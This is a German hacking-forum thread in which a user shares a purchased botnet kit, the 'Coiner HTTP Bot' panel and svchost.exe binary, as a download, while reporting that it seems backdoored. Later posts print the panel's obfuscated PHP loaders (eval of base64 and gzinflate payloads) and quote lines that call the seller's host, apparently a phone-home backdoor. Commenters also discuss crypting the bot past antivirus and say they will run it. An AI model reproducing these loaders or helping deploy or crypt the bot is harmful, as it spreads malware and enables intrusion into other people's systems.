Zum Inhalt wechseln

Als Gast hast du nur eingeschränkten Zugriff!


Anmelden 

Benutzerkonto erstellen

Du bist nicht angemeldet und hast somit nur einen sehr eingeschränkten Zugriff auf die Features unserer Community.
Um vollen Zugriff zu erlangen musst du dir einen Account erstellen. Der Vorgang sollte nicht länger als 1 Minute dauern.

  • Antworte auf Themen oder erstelle deine eigenen.
  • Schalte dir alle Downloads mit Highspeed & ohne Wartezeit frei.
  • Erhalte Zugriff auf alle Bereiche und entdecke interessante Inhalte.
  • Tausche dich mich anderen Usern in der Shoutbox oder via PN aus.
 

   

Foto

HTTP Coiner Bot - by MyCodeBoard.com (hackforums)

- - - - -

  • Bitte melde dich an um zu Antworten
22 Antworten in diesem Thema

#1
syrius

syrius

    Noob

  • Members
  • PIPPIP
  • Likes
    31
  • 13 Beiträge
  • 100 Bedankt

*
BELIEBT

Achtung - Bitte genau lesen!

Hallo,

habe vor wenigen Tagen einen Bot namens "Coiner HTTP Bot" auf hackforums gekauft der wohl backdoored ist. Nach installation und Inbetriebnahme auf einem eigens dafür eingerichteten vServer war kurzerhand später mein MySQL geknackt (alle Benutzertabellen gelöscht). Das passierte ca 1-2 Minuten nach der Inbetriebnahme. Server wurde natürlich gleich neu installiert!

Die Binary connected wie gewünscht auf den host

Please Login HERE or Register HERE to see this link!

und spricht die "run.php" aus dem root-DIR an. Passt also. Beim aufrufen des Panels wird eine customer.php bzw. newcustomer.php auf deren Server angesprochen. Weiter habe ich das Teil nicht mehr auseinander genommen. Nachdem er die Binary nicht gleich bereitgestellt hat (angeblich wartet er auf seinen Entwickler) hat er mir dann ein Tag später ein zweites Panel geschickt wobei er meinte der Bot würde nur noch damit funktionieren - im alten Panel hat er aber den News-Link zum 2. Panel nicht aktualisiert ... also alles sehr merkwürdig.

Im Download enthalten ist:
- 1st_panel
- 2nd_panel
- svchost.exe (Bot-Binary)

Ich stelle euch das hier bereit in der Hoffnung den vielleicht doch noch in Betrieb nehmen zu können - wenn nicht kümmerts mich ehrlich gesagt auch nicht aber die Funktionen zumindest wie beschrieben, sind schon beachtlich!

Gezahlt habe ich dafür 100$ in BTC - reden wir nicht drüber ist mir irgendwo auch egal.

Es wäre natürlich wünschenswert, wenn jemand den Bot im falle von Erfolg wieder hier bereitgestellt wird!

PS: Passt bitte auf und wenn ihr ihn in Betrieb nehmt schön den Server im Auge behalten - jemand der keine Ahnung hat sollte sich damit nicht beschäftigen!


Virustotal 18/54:

Please Login HERE or Register HERE to see this link!





Eingefügtes Bild


Eingefügtes Bild



Achtung! Text auch wirklich gelesen?


Download:

Versteckter Inhalt
Klicke auf den Danke-Button um den versteckten Inhalt sehen zu können. Nur registrierte Mitglieder haben Zugriff hierauf.


  • mrundercover, redcore, Torenjk und 25 anderen gefällt das
Nur wer groß denkt, kann großes erreichen!

Thanked by 99 Members:
parisdefr , BryZoe , x1337x , Avni , D3n1s230290 , Logitech , jcwolf21 , Platon666 , dvalar , shado7 , scrack , bumg2 , Take1T , cr0ssload , caballo , xxxsmackxxx , MuesliChabo , Maxh , snippa , iShiZo , thanh109 , Bypass , biosmanp , redrom696 , alienware2015 , FalkE , Ruthless , Manzer , ueEqlL , jut4h.tm , craazzzzzy , Haymac , Phesii , Th3xploiterZ , mrundercover , ktkoti , Xantar , jackzett , redcore , Revelead , jonk , Shqipenet , johntheawe , someuser1 , shiznith , jinx , arttuki , Bbahd300 , nWostealer , Torenjk , dompetri , Eester , KiTroX , armani6969 , pcquad , xNominus , xmarcox3 , Jozeh , blaby , dfhys , devphreak , ByteLSX , czudik , cyberrainalpha , heroe99 , m0rpheus , estiven99999 , ka0z , jammy , 133TFoX , RYA-247 , summo , JU571C3 , nucleus96 , sub0 , viyiper , wtfh0ax , PaulaAbdul , darty , notinsane , ZanGetsu , kpakpando , Rayleigh++ , antoshka2245 , daty009 , Omniscient , Joker Dark Knight , ~ Flo , Nav0 , Iron , DarkICE , pdr0 , conteaza , mikewaals , testerkingg , ace5 , MrStar , nibble nibble , kil0

#2
hikhack7

hikhack7

    Hacktivist

  • Members
  • PIPPIPPIPPIPPIP
  • Likes
    58
  • 63 Beiträge
  • 77 Bedankt
Wenn du dein Hide-thx wegmachst, kann man die PHP-Files gerne mal anschaun..
  • Becks, Cube, B1nary und 2 anderen gefällt das

Wissen ist Macht.


Thanked by 1 Member:
snippa

#3
zepsus

zepsus

    Pentester

  • Premium Member
  • Likes
    168
  • 117 Beiträge
  • 100 Bedankt
  • Android [root]
  • Windows
Off-Topic:

Jetzt ohne Spaß ich verstehe einfach nicht wie man was bei hf kaufen kann :D

und dann auch noch den Server auf Virustotal gescannt :D

mehr kann man überhaupt nicht falsch machen

#4
syrius

syrius

    Noob

  • Members
  • PIPPIP
  • Likes
    31
  • 13 Beiträge
  • 100 Bedankt

Off-Topic:

Jetzt ohne Spaß ich verstehe einfach nicht wie man was bei hf kaufen kann :D

und dann auch noch den Server auf Virustotal gescannt :D

mehr kann man überhaupt nicht falsch machen


Das steht nicht zur Rede! Virustotal? Schau dir das Teil doch mal an das muss sowieso crypted werden also mach dir doch nicht ins Hemd. :-D Außerdem wird Virustotal in den Forenregeln noch vorgeschlagen.

Bearbeitet von msgme139, 28 June 2014 - 19:36 Uhr.

  • Framerater gefällt das
Nur wer groß denkt, kann großes erreichen!

#5
most_uniQue

most_uniQue

    AV Agent

  • Premium Member
  • Likes
    228
  • 478 Beiträge
  • 500 Bedankt
  • iPhone
  • Windows, Linux, Mac OS
Das sagt doch aber schon alles.
Nen Bot, der zum VERKAUF steht, auf VT scannen, damit die Antivir-Hersteller es auch gleich haben und in 1-2 Tagen alles eh keinen Sinn mehr hat, außer du hast Crypter. ^^.png' class='bbc_emoticon' alt='^^' />

Eingefügtes Bild


#6
0x92

0x92

    Script Kiddie

  • Members
  • PIPPIPPIPPIP
  • Likes
    31
  • 45 Beiträge
  • 7 Bedankt
Wenn man eins in der Scene lernt, nichts auf HF kaufen..
  • Becks gefällt das

Alle von mir verfassten Beiträge & Diskussionen sind lediglich rein theoretischer Natur.

 

 

Eingefügtes Bild


#7
Bad Grandpa

Bad Grandpa

    ehem. BauerIvan

  • Members
  • PIPPIPPIPPIPPIP
  • Likes
    27
  • 65 Beiträge
  • 59 Bedankt
Kannst Rastajan mal fragen ob er mal ein Auge draufwerfen kann
  • .com gefällt das

#8
ProHex

ProHex

    Hacker

  • Moderator
  • Likes
    220
  • 223 Beiträge
  • 193 Bedankt
wieso connected der per tcp zu google? O.O.png' class='bbc_emoticon' alt='o.O' />

#9
syrius

syrius

    Noob

  • Members
  • PIPPIP
  • Likes
    31
  • 13 Beiträge
  • 100 Bedankt
Hast du Chrome laufen? Dann ist das ausgehend nämlich vom Browser...

Bearbeitet von msgme139, 29 June 2014 - 01:48 Uhr.

Nur wer groß denkt, kann großes erreichen!

#10
ProHex

ProHex

    Hacker

  • Moderator
  • Likes
    220
  • 223 Beiträge
  • 193 Bedankt

Hast du Chrome laufen? Dann ist das ausgehend nämlich vom Browser...


nein, das kommt von dem aus.

#11
syrius

syrius

    Noob

  • Members
  • PIPPIP
  • Likes
    31
  • 13 Beiträge
  • 100 Bedankt
die footer.php und header.php im ordner "html" sind base64 crypted - hab das mal decrypted aber da steht echt kranker scheiss drin ^^.png' class='bbc_emoticon' alt='^^' />
Nur wer groß denkt, kann großes erreichen!

#12
ProHex

ProHex

    Hacker

  • Moderator
  • Likes
    220
  • 223 Beiträge
  • 193 Bedankt

die footer.php und header.php im ordner "html" sind base64 crypted - hab das mal decrypted aber da steht echt kranker scheiss drin ^^.png' class='bbc_emoticon' alt='^^' />


nicht nur das:

Please Login HERE or Register HERE to see this link!


Please Login HERE or Register HERE to see this link!



dahin connected das teil.

Zeig mal den base64 decoded teil

#13
syrius

syrius

    Noob

  • Members
  • PIPPIP
  • Likes
    31
  • 13 Beiträge
  • 100 Bedankt
header.php
Original
<?php /*** PHP Encode v1.0 by zeura.com ***/ $XnNhAWEnhoiqwciqpoHH=file(__FILE__);eval(base64_decode("aWYoIWZ1bmN0aW9uX2V4aXN0cygiWWl1bklVWTc2YkJodWhOWUlPOCIpKXtmdW5jdGlvbiBZaXVuSVVZNzZiQmh1aE5ZSU84KCRnLCRiPTApeyRhPWltcGxvZGUoIlxuIiwkZyk7JGQ9YXJyYXkoNjU1LDIzNiw0MCk7aWYoJGI9PTApICRmPXN1YnN0cigkYSwkZFswXSwkZFsxXSk7ZWxzZWlmKCRiPT0xKSAkZj1zdWJzdHIoJGEsJGRbMF0rJGRbMV0sJGRbMl0pO2Vsc2UgJGY9dHJpbShzdWJzdHIoJGEsJGRbMF0rJGRbMV0rJGRbMl0pKTtyZXR1cm4oJGYpO319"));eval(base64_decode(YiunIUY76bBhuhNYIO8($XnNhAWEnhoiqwciqpoHH)));eval(ZsldkfhGYU87iyihdfsow(YiunIUY76bBhuhNYIO8($XnNhAWEnhoiqwciqpoHH,2),YiunIUY76bBhuhNYIO8($XnNhAWEnhoiqwciqpoHH,1)));__halt_compiler();aWYoIWZ1bmN0aW9uX2V4aXN0cygiWnNsZGtmaEdZVTg3aXlpaGRmc293Iikpe2Z1bmN0aW9uIFpzbGRrZmhHWVU4N2l5aWhkZnNvdygkYSwkaCl7aWYoJGg9PXNoYTEoJGEpKXtyZXR1cm4oZ3ppbmZsYXRlKGJhc2U2NF9kZWNvZGUoJGEpKSk7fWVsc2V7ZWNobygiRXJyb3I6IEZpbGUgTW9kaWZpZWQiKTt9fX0=bc26a5b7e507733e6489be166c7c3dca6873b341vRdrb9s28PMC5D9chQC2h8jah7XoEttfMhcp5iJBYmwYgsCgpJPNhCIVknJsFPnvO+plW3G7eBtmyBDJex/vJYPGcCVnxjJtu73z4yOg3w/VS+NTzjXOlIyw2+EyCkyJ388WWcdh70GJlEz4fINBz0morFFScIkwhHRtnsRM5ulMq2fTLbdPOep117sdT8YXU/gRPt1cfYFIcJTWwB+X45sxkI42NzD5/NsYOlcFt47Xq2RgtFDQOT4avPv16mL65/UYFjYVIzpwbxBMzoceSm/kTBsskMWj0shBipZBtGDaoB16uU38j14Ns9wKHF0oEqUHQbk7PqqA73wfJkhqrQUa8P2aiBR7hIXGZOiFigy3mmVBZEzQ7Pq080CjGHol9QLRNkKLI7DrDIeexZV1tDUQIFTxGr7WO4CMxTGXc9+q7Aw+/JStzl/DyP1WpWfw8zb4pRIXFPLerryv0WRKGr7Eb9qx5aHL6ZfJezALnp5CojR8Hn/wP4LJs0xpCyqpEFBgWtz1xo9EfccTEJZo4Jf7xgMDE2meWTA62lbywQTuqt+TqGX/gTxGlhWIDb87lDFP7gsJtfFVJBRR4Vy7AcV8SQHIjBl6ki1DpqF8+VwukYKl3iZ8hbFz/+aOXtMSEYXQBmMXh1LGMt5CcArldG+yCoVy49U0oZVAf7/k70HMLCMt5nOBjqEQLDNYHzM9d8HdJ2S/ge3Icm7NmKy5c1LJd3ydF+n8f8EdBKWNu4essVgzGXtVcHIZ48oVGa9JT7ZLt3sHjdnwTftzsYXfhnbOXWAkXOCMXDlzN+bCtestrM3OgiBdRyrGUDEd9yOVBhKfTWDYEqPcUO5RwBTKumrFk27IDEqWYvdkdju++X18c9e5vrym9eRT5743dOnEbEXxtY5IKGvcRmHBa4VZZCkdyamscs+GfjTg6bzMFVoEFUDOvdGtWzq3DQLBR1tWvqAwWIitJJKkf826ZA4v4Pi+xQVV8W85oeWD7zphm0NL1wbktL0oN21993qkUmDHI/+FnFLS271jmXnc9U3bM9/3zYa+pXEFcPpO3XLfLf5diPxT5k2EbFtR27UjQai5yu0+ETXEyZgU60ZIyXfDvZX/QS5a5YhKyMi1oWCncG5a1Aarqfxbu3pNu/bM8MCWrGxO5fnw4N9un4RrwSKMgVmwCwTqc66zumWsotw1VjCq2GdsTsOKUCyGhBmLeovRdl+lqEFrXFN9KEazvR11PwF1Y5oOrBsT307EBGp7AH6qYiYOwI+1ymL1fIhKdEo3brKDbGfhIdhKCcuzAygylSmaPg6gKFvqAQR1mB9CwrTKDb66j2quCorBqkhuyoSTkNEsFNOHwIHdNCr6fChU9Ihx365s1U2hSwMgPd2K8ymxXChjw7WroLBVQi+n0+vZ5dXtlGpor0ffDbjitusNEpLv5gKlhxrj0VhrGlRPIRPIioGBprPIQhY95ZQ2BHpk9CHDJS1jSiCrYE7TGx3QfJsyF/jAQio8sFa5hkphyjyJYhA4WSOv/tKq20kxupKL/gI=


#1
if(!function_exists("YiunIUY76bBhuhNYIO8")){function YiunIUY76bBhuhNYIO8($g,$b=0){$a=implode("n",$g);$d=array(655,236,40);if($b==0) $f=substr($a,$d[0],$d[1]);elseif($b==1) $f=substr($a,$d[0]+$d[1],$d[2]);else $f=trim(substr($a,$d[0]+$d[1]+$d[2]));return($f);}}

#2
if(!function_exists("ZsldkfhGYU87iyihdfsow")){function ZsldkfhGYU87iyihdfsow($a,$h){if($h==sha1($a)){return(gzinflate(base64_decode($a)));}else{echo("Error: File Modified");}}}snNw[{^s7u????oE??<!@-6z?…yX ()$ad>{Vn??2^` Yn|7Rs#,6L"w?–q{be> sj+T"L!g9S*mzuSOW`R%5d#>6m-4O>zFH??3?’$1hbm6^S#??lJAnN??;?’AF?f!q:!b-PY4;><(}@M:!e]m
D<F#1Le%+s?UY<??)D<+Yyhre^?§?lB??D=qq%8%gLA;OboSm|UIxW.q_@r#^P_>W`w!l?„at?±]?‚?M(eP;sycD]wI/{rf+.??]'EGA)cn,V^xFkSv|~aw???X 8#zk3sQ?±G}AX6;p2d??__o)y:q|mc
pZVY
Grjk???8:o3VP3tkV?­@Q??"+I$n>/AU|[hy`??f-/J
_}?©1gX^w=SvaA>b?avHj.rOMq2f:?’2]eKb2-hX)?“n<0%~|87?§H Vl:k(
U*!b??]jZJG]O]X??«?±#r_"?¬HvrJf
Af?°2o?«j$4K4 wM
="w5ShRwblW
j,Pyu{e+n8Da??V?•D"`iye
=pKX?€*t&?…0,ar"XHLn

Nur wer groß denkt, kann großes erreichen!

#14
syrius

syrius

    Noob

  • Members
  • PIPPIP
  • Likes
    31
  • 13 Beiträge
  • 100 Bedankt
Original footer.php
<?php /*** PHP Encode v1.0 by zeura.com ***/ $XnNhAWEnhoiqwciqpoHH=file(__FILE__);eval(base64_decode("aWYoIWZ1bmN0aW9uX2V4aXN0cygiWWl1bklVWTc2YkJodWhOWUlPOCIpKXtmdW5jdGlvbiBZaXVuSVVZNzZiQmh1aE5ZSU84KCRnLCRiPTApeyRhPWltcGxvZGUoIlxuIiwkZyk7JGQ9YXJyYXkoNjU1LDIzNiw0MCk7aWYoJGI9PTApICRmPXN1YnN0cigkYSwkZFswXSwkZFsxXSk7ZWxzZWlmKCRiPT0xKSAkZj1zdWJzdHIoJGEsJGRbMF0rJGRbMV0sJGRbMl0pO2Vsc2UgJGY9dHJpbShzdWJzdHIoJGEsJGRbMF0rJGRbMV0rJGRbMl0pKTtyZXR1cm4oJGYpO319"));eval(base64_decode(YiunIUY76bBhuhNYIO8($XnNhAWEnhoiqwciqpoHH)));eval(ZsldkfhGYU87iyihdfsow(YiunIUY76bBhuhNYIO8($XnNhAWEnhoiqwciqpoHH,2),YiunIUY76bBhuhNYIO8($XnNhAWEnhoiqwciqpoHH,1)));__halt_compiler();aWYoIWZ1bmN0aW9uX2V4aXN0cygiWnNsZGtmaEdZVTg3aXlpaGRmc293Iikpe2Z1bmN0aW9uIFpzbGRrZmhHWVU4N2l5aWhkZnNvdygkYSwkaCl7aWYoJGg9PXNoYTEoJGEpKXtyZXR1cm4oZ3ppbmZsYXRlKGJhc2U2NF9kZWNvZGUoJGEpKSk7fWVsc2V7ZWNobygiRXJyb3I6IEZpbGUgTW9kaWZpZWQiKTt9fX0=7e707aadb2f7261f8ab96abece4dda6903040434TY2xDoJAEER7E/9hcg2VoMZOoLE28RfO3VU2EfY8DhP+XgIanWpm3iQj1BgyACXrC8qVu5klia5erzBrBvTwfV85si557f7xNAhf3A5JGBSFNbn6ZGGMem8SziMZy9V85JysxQYXeg6esd/uDnlZhN9ZMb190uKXPju+AQ==

#1
if(!function_exists("YiunIUY76bBhuhNYIO8")){function YiunIUY76bBhuhNYIO8($g,$b=0){$a=implode("n",$g);$d=array(655,236,40);if($b==0) $f=substr($a,$d[0],$d[1]);elseif($b==1) $f=substr($a,$d[0]+$d[1],$d[2]);else $f=trim(substr($a,$d[0]+$d[1]+$d[2]));return($f);}}

encoded #2 - das hier ausm Original scheint irgendwas anderes zu sein. Dachte erst an einen SSH-Key
aWYoIWZ1bmN0aW9uX2V4aXN0cygiWnNsZGtmaEdZVTg3aXlpaGRmc293Iikpe2Z1bmN0aW9uIFpzbGRrZmhHWVU4N2l5aWhkZnNvdygkYSwkaCl7aWYoJGg9PXNoYTEoJGEpKXtyZXR1cm4oZ3ppbmZsYXRlKGJhc2U2NF9kZWNvZGUoJGEpKSk7fWVsc2V7ZWNobygiRXJyb3I6IEZpbGUgTW9kaWZpZWQiKTt9fX0=7e707aadb2f7261f8ab96abece4dda6903040434TY2xDoJAEER7E/9hcg2VoMZOoLE28RfO3VU2EfY8DhP+XgIanWpm3iQj1BgyACXrC8qVu5klia5erzBrBvTwfV85si557f7xNAhf3A5JGBSFNbn6ZGGMem8SziMZy9V85JysxQYXeg6esd/uDnlZhN9ZMb190uKXPju+AQ==

#EDIT: Doch OMG Das #2 ist ein SSH-Key O.O.png' class='bbc_emoticon' alt='o.O' /> solche wi**ser!!

Bearbeitet von msgme139, 29 June 2014 - 02:17 Uhr.

Nur wer groß denkt, kann großes erreichen!

#15
ProHex

ProHex

    Hacker

  • Moderator
  • Likes
    220
  • 223 Beiträge
  • 193 Bedankt

header.php
Original

<?php /*** PHP Encode v1.0 by zeura.com ***/ $XnNhAWEnhoiqwciqpoHH=file(__FILE__);eval(base64_decode("aWYoIWZ1bmN0aW9uX2V4aXN0cygiWWl1bklVWTc2YkJodWhOWUlPOCIpKXtmdW5jdGlvbiBZaXVuSVVZNzZiQmh1aE5ZSU84KCRnLCRiPTApeyRhPWltcGxvZGUoIlxuIiwkZyk7JGQ9YXJyYXkoNjU1LDIzNiw0MCk7aWYoJGI9PTApICRmPXN1YnN0cigkYSwkZFswXSwkZFsxXSk7ZWxzZWlmKCRiPT0xKSAkZj1zdWJzdHIoJGEsJGRbMF0rJGRbMV0sJGRbMl0pO2Vsc2UgJGY9dHJpbShzdWJzdHIoJGEsJGRbMF0rJGRbMV0rJGRbMl0pKTtyZXR1cm4oJGYpO319"));eval(base64_decode(YiunIUY76bBhuhNYIO8($XnNhAWEnhoiqwciqpoHH)));eval(ZsldkfhGYU87iyihdfsow(YiunIUY76bBhuhNYIO8($XnNhAWEnhoiqwciqpoHH,2),YiunIUY76bBhuhNYIO8($XnNhAWEnhoiqwciqpoHH,1)));__halt_compiler();aWYoIWZ1bmN0aW9uX2V4aXN0cygiWnNsZGtmaEdZVTg3aXlpaGRmc293Iikpe2Z1bmN0aW9uIFpzbGRrZmhHWVU4N2l5aWhkZnNvdygkYSwkaCl7aWYoJGg9PXNoYTEoJGEpKXtyZXR1cm4oZ3ppbmZsYXRlKGJhc2U2NF9kZWNvZGUoJGEpKSk7fWVsc2V7ZWNobygiRXJyb3I6IEZpbGUgTW9kaWZpZWQiKTt9fX0=bc26a5b7e507733e6489be166c7c3dca6873b341vRdrb9s28PMC5D9chQC2h8jah7XoEttfMhcp5iJBYmwYgsCgpJPNhCIVknJsFPnvO+plW3G7eBtmyBDJex/vJYPGcCVnxjJtu73z4yOg3w/VS+NTzjXOlIyw2+EyCkyJ388WWcdh70GJlEz4fINBz0morFFScIkwhHRtnsRM5ulMq2fTLbdPOep117sdT8YXU/gRPt1cfYFIcJTWwB+X45sxkI42NzD5/NsYOlcFt47Xq2RgtFDQOT4avPv16mL65/UYFjYVIzpwbxBMzoceSm/kTBsskMWj0shBipZBtGDaoB16uU38j14Ns9wKHF0oEqUHQbk7PqqA73wfJkhqrQUa8P2aiBR7hIXGZOiFigy3mmVBZEzQ7Pq080CjGHol9QLRNkKLI7DrDIeexZV1tDUQIFTxGr7WO4CMxTGXc9+q7Aw+/JStzl/DyP1WpWfw8zb4pRIXFPLerryv0WRKGr7Eb9qx5aHL6ZfJezALnp5CojR8Hn/wP4LJs0xpCyqpEFBgWtz1xo9EfccTEJZo4Jf7xgMDE2meWTA62lbywQTuqt+TqGX/gTxGlhWIDb87lDFP7gsJtfFVJBRR4Vy7AcV8SQHIjBl6ki1DpqF8+VwukYKl3iZ8hbFz/+aOXtMSEYXQBmMXh1LGMt5CcArldG+yCoVy49U0oZVAf7/k70HMLCMt5nOBjqEQLDNYHzM9d8HdJ2S/ge3Icm7NmKy5c1LJd3ydF+n8f8EdBKWNu4essVgzGXtVcHIZ48oVGa9JT7ZLt3sHjdnwTftzsYXfhnbOXWAkXOCMXDlzN+bCtestrM3OgiBdRyrGUDEd9yOVBhKfTWDYEqPcUO5RwBTKumrFk27IDEqWYvdkdju++X18c9e5vrym9eRT5743dOnEbEXxtY5IKGvcRmHBa4VZZCkdyamscs+GfjTg6bzMFVoEFUDOvdGtWzq3DQLBR1tWvqAwWIitJJKkf826ZA4v4Pi+xQVV8W85oeWD7zphm0NL1wbktL0oN21993qkUmDHI/+FnFLS271jmXnc9U3bM9/3zYa+pXEFcPpO3XLfLf5diPxT5k2EbFtR27UjQai5yu0+ETXEyZgU60ZIyXfDvZX/QS5a5YhKyMi1oWCncG5a1Aarqfxbu3pNu/bM8MCWrGxO5fnw4N9un4RrwSKMgVmwCwTqc66zumWsotw1VjCq2GdsTsOKUCyGhBmLeovRdl+lqEFrXFN9KEazvR11PwF1Y5oOrBsT307EBGp7AH6qYiYOwI+1ymL1fIhKdEo3brKDbGfhIdhKCcuzAygylSmaPg6gKFvqAQR1mB9CwrTKDb66j2quCorBqkhuyoSTkNEsFNOHwIHdNCr6fChU9Ihx365s1U2hSwMgPd2K8ymxXChjw7WroLBVQi+n0+vZ5dXtlGpor0ffDbjitusNEpLv5gKlhxrj0VhrGlRPIRPIioGBprPIQhY95ZQ2BHpk9CHDJS1jSiCrYE7TGx3QfJsyF/jAQio8sFa5hkphyjyJYhA4WSOv/tKq20kxupKL/gI=


#1
if(!function_exists("YiunIUY76bBhuhNYIO8")){function YiunIUY76bBhuhNYIO8($g,$b=0){$a=implode("n",$g);$d=array(655,236,40);if($b==0) $f=substr($a,$d[0],$d[1]);elseif($b==1) $f=substr($a,$d[0]+$d[1],$d[2]);else $f=trim(substr($a,$d[0]+$d[1]+$d[2]));return($f);}}

#2
if(!function_exists("ZsldkfhGYU87iyihdfsow")){function ZsldkfhGYU87iyihdfsow($a,$h){if($h==sha1($a)){return(gzinflate(base64_decode($a)));}else{echo("Error: File Modified");}}}snNw[{^s7u????oE??<!@-6z?…yX ()$ad>{Vn??2^` Yn|7Rs#,6L"w?–q{be> sj+T"L!g9S*mzuSOW`R%5d#>6m-4O>zFH??3?’$1hbm6^S#??lJAnN??;?’AF?f!q:!b-PY4;><(}@M:!e]m
D<F#1Le%+s?UY<??)D<+Yyhre^?§?lB??D=qq%8%gLA;OboSm|UIxW.q_@r#^P_>W`w!l?„at?±]?‚?M(eP;sycD]wI/{rf+.??]'EGA)cn,V^xFkSv|~aw???X 8#zk3sQ?±G}AX6;p2d??__o)y:q|mc
pZVY
Grjk???8:o3VP3tkV?­@Q??"+I$n>/AU|[hy`????f-/J
_}?©1gX^w=SvaA>b?avHj.rOMq2f:?’2]eKb2-hX)?“n<0%~|87?§H Vl:k(
U*!b??]jZJG]O]X??«?±#r_"?¬HvrJf
Af?°2o?«j$4K4 wM
="w5ShRwblW
j,Pyu{e+n8Da??V?•D"`iye
=pKX?€*t&?…0,ar"XHLn


if(!function_exists("ZsldkfhGYU87iyihdfsow")){function ZsldkfhGYU87iyihdfsow($a,$h){if($h==sha1($a)){return(gzinflate(base64_decode($a)));}else{echo("Error: File Modified");}}}

#2

#16
conteaza

conteaza

    Leecher

  • Members
  • PIP
  • Likes
    0
  • 1 Beiträge
  • 2 Bedankt
what's the password of archive?

Thanked by 2 Members:
Shqipenet , heroe99

#17
pdr0

pdr0

    Pentester

  • Premium Member
  • Likes
    86
  • 148 Beiträge
  • 87 Bedankt

Original footer.php

<?php /*** PHP Encode v1.0 by zeura.com ***/ $XnNhAWEnhoiqwciqpoHH=file(__FILE__);eval(base64_decode("aWYoIWZ1bmN0aW9uX2V4aXN0cygiWWl1bklVWTc2YkJodWhOWUlPOCIpKXtmdW5jdGlvbiBZaXVuSVVZNzZiQmh1aE5ZSU84KCRnLCRiPTApeyRhPWltcGxvZGUoIlxuIiwkZyk7JGQ9YXJyYXkoNjU1LDIzNiw0MCk7aWYoJGI9PTApICRmPXN1YnN0cigkYSwkZFswXSwkZFsxXSk7ZWxzZWlmKCRiPT0xKSAkZj1zdWJzdHIoJGEsJGRbMF0rJGRbMV0sJGRbMl0pO2Vsc2UgJGY9dHJpbShzdWJzdHIoJGEsJGRbMF0rJGRbMV0rJGRbMl0pKTtyZXR1cm4oJGYpO319"));eval(base64_decode(YiunIUY76bBhuhNYIO8($XnNhAWEnhoiqwciqpoHH)));eval(ZsldkfhGYU87iyihdfsow(YiunIUY76bBhuhNYIO8($XnNhAWEnhoiqwciqpoHH,2),YiunIUY76bBhuhNYIO8($XnNhAWEnhoiqwciqpoHH,1)));__halt_compiler();aWYoIWZ1bmN0aW9uX2V4aXN0cygiWnNsZGtmaEdZVTg3aXlpaGRmc293Iikpe2Z1bmN0aW9uIFpzbGRrZmhHWVU4N2l5aWhkZnNvdygkYSwkaCl7aWYoJGg9PXNoYTEoJGEpKXtyZXR1cm4oZ3ppbmZsYXRlKGJhc2U2NF9kZWNvZGUoJGEpKSk7fWVsc2V7ZWNobygiRXJyb3I6IEZpbGUgTW9kaWZpZWQiKTt9fX0=7e707aadb2f7261f8ab96abece4dda6903040434TY2xDoJAEER7E/9hcg2VoMZOoLE28RfO3VU2EfY8DhP+XgIanWpm3iQj1BgyACXrC8qVu5klia5erzBrBvTwfV85si557f7xNAhf3A5JGBSFNbn6ZGGMem8SziMZy9V85JysxQYXeg6esd/uDnlZhN9ZMb190uKXPju+AQ==

#1
if(!function_exists("YiunIUY76bBhuhNYIO8")){function YiunIUY76bBhuhNYIO8($g,$b=0){$a=implode("n",$g);$d=array(655,236,40);if($b==0) $f=substr($a,$d[0],$d[1]);elseif($b==1) $f=substr($a,$d[0]+$d[1],$d[2]);else $f=trim(substr($a,$d[0]+$d[1]+$d[2]));return($f);}}

encoded #2 - das hier ausm Original scheint irgendwas anderes zu sein. Dachte erst an einen SSH-Key
aWYoIWZ1bmN0aW9uX2V4aXN0cygiWnNsZGtmaEdZVTg3aXlpaGRmc293Iikpe2Z1bmN0aW9uIFpzbGRrZmhHWVU4N2l5aWhkZnNvdygkYSwkaCl7aWYoJGg9PXNoYTEoJGEpKXtyZXR1cm4oZ3ppbmZsYXRlKGJhc2U2NF9kZWNvZGUoJGEpKSk7fWVsc2V7ZWNobygiRXJyb3I6IEZpbGUgTW9kaWZpZWQiKTt9fX0=7e707aadb2f7261f8ab96abece4dda6903040434TY2xDoJAEER7E/9hcg2VoMZOoLE28RfO3VU2EfY8DhP+XgIanWpm3iQj1BgyACXrC8qVu5klia5erzBrBvTwfV85si557f7xNAhf3A5JGBSFNbn6ZGGMem8SziMZy9V85JysxQYXeg6esd/uDnlZhN9ZMb190uKXPju+AQ==

#EDIT: Doch OMG Das #2 ist ein SSH-Key O.O.png' class='bbc_emoticon' alt='o.O' /> solche wi**ser!!



Hallo,

der Code ist nicht verschlüsselt er ist nur, wie der Name schon sagt, encoded (obfuscated), dass kann hier gemacht werden:

Please Login HERE or Register HERE to see this link!

.

Ihr könntet php debuggen und warten bis der Code decoded im Speicher liegt oder das Kommandozeilentool nutzen .

$ php html/footer.php
<div id="footer">
	 <div class="container">
	 <p class="muted credit">Copyright Mycodeboard.com - Pcquad 2014.</p>
	 </div>
</div>	

Edit:
Bevor ihr das mit der Header "zuhause" macht, solltet ihr eure IP vielleicht ...
$banned = file_get_contents("[url="http://mycodeboard.com/news/coinerblocked.txt"]http://mycodeboard.c...nerblocked.txt"[/url]);
file_get_contents("[url="http://mycodeboard.com/news/savecustomers.php"]http://mycodeboard.c...ecustomers.php"[/url]);
(Ausserdem habe ich ProHex aus den Qoutes entfernt, passte doch so nicht ganz ;))
Oder ihr macht es wie im Hide:
Versteckter Inhalt
Klicke auf den Danke-Button um den versteckten Inhalt sehen zu können. Nur registrierte Mitglieder haben Zugriff hierauf.



Wie ist das Passwort für das zip? Geht auch per PN :)

Thanked by 35 Members:
Avni , Platon666 , MrElliwood , bumg2 , cr0ssload , Maxh , thanh109 , Bypass , redrom696 , klaudius , biosmanp , FalkE , tingle , ueEqlL , Dean36 , IceWolfBiH , craazzzzzy , Haymac , Phesii , mrundercover , ktkoti , jackzett , Shqipenet , shiznith , nWostealer , heroe99 , xmarcox3 , dfhys , PoC , czudik , m0rpheus , ka0z , nucleus96 , pekeinfo , Ich

#18
pekeinfo

pekeinfo

    Leecher

  • Members
  • PIP
  • Likes
    0
  • 1 Beiträge
  • 0 Bedankt
good job, i don't see but thx for share. i go to try and comment

#19
Naws

Naws

    Noob

  • Members
  • PIPPIP
  • Likes
    0
  • 13 Beiträge
  • 1 Bedankt
Nice leak, I will try it =)

#20
pdr0

pdr0

    Pentester

  • Premium Member
  • Likes
    86
  • 148 Beiträge
  • 87 Bedankt

good job, i don't see but thx for share. i go to try and comment


You can see the hidden content if you click the "thx"-button. If you like a post click also on "gefällt mir" Button (the green button, it's a "like" button). ;)
  • shiznith gefällt das




Dieses Thema wurde von 299 Mitglied(ern) gelesen


